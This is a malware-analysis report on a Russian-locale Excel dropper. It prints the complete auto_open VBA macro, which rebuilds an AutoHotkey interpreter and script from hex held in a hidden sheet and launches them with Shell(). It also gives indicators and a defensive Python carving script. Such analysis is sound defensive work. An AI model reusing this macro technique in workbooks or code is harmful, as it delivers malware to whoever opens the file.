MALICIOUS (Risk Score 248)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1105 Ingress Tool Transfer
The sample is a malicious Excel workbook (OOXML with an embedded `xl/vbaProject.bin`) containing VBA macros. The `auto_open` macro rebuilds two files, `AutoHotkeyU32.exe` and `AutoHotkeyU32.ahk`, from hex strings stored in columns 24 (X) and 25 (Y) of a worksheet whose name is a single space (`Sheets(" ")`), reading rows from the top until the first empty cell. It writes both files to `C:\ProgramData\` and then calls `Shell()` to run `AutoHotkeyU32.exe` with the `.ahk` file as its argument. `AutoHotkeyU32.exe` is the file name of the AutoHotkey Unicode 32-bit interpreter, so the executable is presumably the legitimate interpreter carried inside the workbook and the script is the actual payload; the VBA itself downloads nothing, which makes this a self-contained dropper rather than a downloader. The URL `http://185.70.186.145/7773/index.php` does not appear in the extracted VBA source; it is presumably carried in the decoded AutoHotkey script and used there to fetch a second-stage payload, which is what the T1105 tag reflects. The workbook's single hidden sheet (see the heuristics) is presumably the sheet holding the hex data. A second macro, `show_document()`, deletes every shape on the active sheet, the usual way a "please enable content" overlay image is cleared once macros run; it is not called from `auto_open` in the extracted source. The empty document modules are named `ЭтаКнига` and `Лист6`, the Russian-locale Excel names for `ThisWorkbook` and `Sheet6`, so the file was authored in a Russian-language Excel. On an endpoint, the artifacts to look for are the two files appearing under `C:\ProgramData\` and an `EXCEL.EXE` process spawning `AutoHotkeyU32.exe`.
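Because the payload bytes live in worksheet cells rather than in the VBA, an analyst can recover both dropped files without opening the workbook in Excel or executing the macro. The script below is an added example, not part of the analyzer output or of the sample: it parses the OOXML package with the standard library, resolves the sheet named `" "`, walks column 24 and 25 top-down until the first empty cell exactly as the macro does (including the macro's `Val("&h..")` behaviour on non-hex characters and its stop at the first empty row), and returns each carved file with its SHA-256. `build_sample_workbook` constructs a minimal test workbook so the code runs offline; the sheet name, column numbers and file names are taken from the macro, everything else (the constructed workbook, its contents, the `skip_row` option) is an assumption of this example.

```python
"""Carve the payloads auto_open rebuilds from cells, straight from the .xlsx zip (added example)."""
import hashlib
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
NS_R = "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}"
NS_PKG = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def vba_hex_decode(hextext):
    """Mirror of the macro's inner loop: Val("&h" & Mid(hextext, y, 2)) stepping by 2.
    Val() reads leading hex digits and yields 0 when there are none, so do the same."""
    out = bytearray()
    for i in range(0, len(hextext), 2):
        digits = re.match(r"[0-9A-Fa-f]*", hextext[i:i + 2]).group(0)
        out.append(int(digits, 16) if digits else 0)
    return bytes(out)


def _sheet_part(z, sheet_name):
    """Resolve a sheet name to its worksheet part through workbook.xml and its .rels."""
    rels = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
    target = {r.get("Id"): r.get("Target") for r in rels.iter(NS_PKG + "Relationship")}
    for sheet in ET.fromstring(z.read("xl/workbook.xml")).iter(NS + "sheet"):
        if sheet.get("name") == sheet_name:
            t = target[sheet.get(NS_R + "id")]
            return t[1:] if t.startswith("/") else "xl/" + t
    raise KeyError("no sheet named %r" % sheet_name)


def _cell_text(cell, shared):
    """Text of a shared-string (t="s"), inline-string or plain cell."""
    if cell.get("t") == "inlineStr":
        return "".join(t.text or "" for t in cell.iter(NS + "t"))
    v = cell.find(NS + "v")
    text = "" if v is None else (v.text or "")
    return shared[int(text)] if text and cell.get("t") == "s" else text


def carve_column(xlsx_bytes, sheet_name, col_index):
    """Read one column top-down until the first empty cell (the macro's Exit For) and
    hex-decode the run. A gap in <row r=".."> numbering is an empty row to the macro."""
    col = chr(64 + col_index)  # single-letter columns only; the macro uses 24 (X) and 25 (Y)
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        shared = []
        if "xl/sharedStrings.xml" in z.namelist():
            sst = ET.fromstring(z.read("xl/sharedStrings.xml"))
            shared = ["".join(t.text or "" for t in si.iter(NS + "t")) for si in sst.iter(NS + "si")]
        sheet = ET.fromstring(z.read(_sheet_part(z, sheet_name)))
    payload, expected = bytearray(), 1
    for row in sheet.iter(NS + "row"):
        if int(row.get("r", expected)) != expected:
            break
        text = ""
        for cell in row.iter(NS + "c"):
            if re.match(r"[A-Z]*", cell.get("r", "")).group(0) == col:
                text = _cell_text(cell, shared)
                break
        if text == "":
            break
        payload += vba_hex_decode(text)
        expected += 1
    return bytes(payload)


def carve_payloads(xlsx_bytes, sheet_name=" "):
    """The files auto_open writes to C:\\ProgramData, keyed by name, with SHA-256 for triage."""
    out = {}
    for name, col in (("AutoHotkeyU32.exe", 24), ("AutoHotkeyU32.ahk", 25)):
        data = carve_column(xlsx_bytes, sheet_name, col)
        out[name] = (data, hashlib.sha256(data).hexdigest())
    return out


def build_sample_workbook(exe_bytes, ahk_text, chunk=16, skip_row=None):
    """Constructed test input, not the real sample: a minimal .xlsx whose hidden sheet " " carries
    hex in column X (shared strings) and Y (inline strings), `chunk` hex chars per row.
    skip_row=N omits <row r="N"> to show how a numbering gap ends the carve early."""
    xs, ys = ([h[i:i + chunk] for i in range(0, len(h), chunk)]
              for h in (exe_bytes.hex().upper(), ahk_text.encode().hex().upper()))
    rows = []
    for i in range(max(len(xs), len(ys))):
        if i + 1 == skip_row:
            continue
        cells = '<c r="X%d" t="s"><v>%d</v></c>' % (i + 1, i) if i < len(xs) else ""
        if i < len(ys):
            cells += '<c r="Y%d" t="inlineStr"><is><t>%s</t></is></c>' % (i + 1, ys[i])
        rows.append('<row r="%d">%s</row>' % (i + 1, cells))
    main, rel, pkg = NS[1:-1], NS_R[1:-1], NS_PKG[1:-1]
    parts = {
        "xl/workbook.xml": '<workbook xmlns="%s" xmlns:r="%s"><sheets>'
        '<sheet name=" " sheetId="1" state="hidden" r:id="rId1"/></sheets></workbook>' % (main, rel),
        "xl/_rels/workbook.xml.rels": '<Relationships xmlns="%s"><Relationship Id="rId1" '
        'Target="worksheets/sheet1.xml"/></Relationships>' % pkg,
        "xl/worksheets/sheet1.xml": '<worksheet xmlns="%s"><sheetData>%s</sheetData></worksheet>'
        % (main, "".join(rows)),
        "xl/sharedStrings.xml": '<sst xmlns="%s">%s</sst>' % (main, "".join("<si><t>%s</t></si>" % s for s in xs)),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, xml in parts.items():
            z.writestr(name, xml)
    return buf.getvalue()
```

Run against the real sample as `carve_payloads(open("sample.xlsx", "rb").read())` and compare the returned hashes against a known-good AutoHotkey interpreter; if the `.exe` hash matches the official build, only the `.ahk` script needs reversing. Stopping at the first row-number gap matters on real files: Excel omits empty `<row>` elements from the XML, and the macro (which iterates every physical row) would stop there too, so a carve that ignored the gap would glue unrelated data onto the end of the file.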
Heuristics (5)
- ClamAV: Doc.Dropper.Agent-6940774-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6940774-0
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): document contains a VBA project; VBA macros present
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
- Hidden worksheet (low, OOXML_HIDDEN_SHEET): Excel workbook contains 1 hidden sheet; hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3671 bytes | 5f3a998d478bf44c91b071c0f41ddb258586f79884ad675b66159d51369c7239 |

Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "Module1"
Sub auto_open()
    Dim sh As Worksheet
    Dim rw As Range
    ' Data sheet: its name is a single space, easy to overlook in the tab bar
    Set sh = Sheets(" ")
    Dim handle As Long
    handle = FreeFile                       ' obtained but never used; file #1 is hard-coded below
    Open "C:\ProgramData\AutoHotkeyU32.exe" For Binary As #1
    Dim hextext As String
    Dim bytes() As Byte
    ReDim bytes(0)
    Dim byteLength As Long
    ' Walk rows from the top, reading column 24 (X), until the first empty cell
    For Each rw In sh.Rows
        hextext = sh.Cells(rw.Row, 24).Value
        If hextext = "" Then
            Exit For
        End If
        ' Decode the cell's hex string two characters at a time; Val("&h..") parses hex
        For y = 1 To Len(hextext)
            byteLength = UBound(bytes)
            ReDim Preserve bytes(byteLength + 1)
            bytes(byteLength) = Val("&h" & Mid(hextext, y, 2))
            y = y + 1                       ' together with Next y this steps by 2
        Next y
    Next rw
    ReDim Preserve bytes(byteLength)        ' drop the one spare element the loop left unassigned
    Put #1, , bytes
    Close #1
    ' Same routine over column 25 (Y) produces the AutoHotkey script
    Set sh = Sheets(" ")
    handle = FreeFile
    Open "C:\ProgramData\AutoHotkeyU32.ahk" For Binary As #1
    ReDim bytes(0)
    For Each rw In sh.Rows
        hextext = sh.Cells(rw.Row, 25).Value
        If hextext = "" Then
            Exit For
        End If
        For y = 1 To Len(hextext)
            byteLength = UBound(bytes)
            ReDim Preserve bytes(byteLength + 1)
            bytes(byteLength) = Val("&h" & Mid(hextext, y, 2))
            y = y + 1
        Next y
    Next rw
    ReDim Preserve bytes(byteLength)
    Put #1, , bytes
    Close #1
    Dim strProgramName As String
    Dim strArgument As String
    strProgramName = "C:\ProgramData\AutoHotkeyU32.exe"
    strArgument = "C:\ProgramData\AutoHotkeyU32.ahk"
    ' Runs the dropped interpreter with the script as its argument:
    ' "C:\ProgramData\AutoHotkeyU32.exe" "C:\ProgramData\AutoHotkeyU32.ahk"
    Call Shell("""" & strProgramName & """ """ & strArgument & """", vbNormalFocus)
End Sub
' Deletes every shape on the active sheet, which is how an "enable content" lure image is
' usually cleared once macros run. Not called from auto_open in this module.
Sub show_document()
    On Error Resume Next
    ActiveSheet.Shapes.SelectAll
    Selection.Delete
    On Error GoTo 0
End Sub
' The remaining modules are the workbook and sheet document modules; they carry only
' attribute headers and no code. ЭтаКнига and Лист6 are the Russian Excel names for
' ThisWorkbook and Sheet6.
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист6"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Worksheet____1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Workbook________"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Worksheet____6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 19456 bytes | 2d1d0c25ab0cf9bb897664cf245be7297a6435288f5bc23ca79892d3a4f5320e |
Detection
- ClamAV: Doc.Dropper.Agent-6940774-0
- Obfuscation or payload: unlikely (the payload bytes live in worksheet cells, not inside the VBA project itself)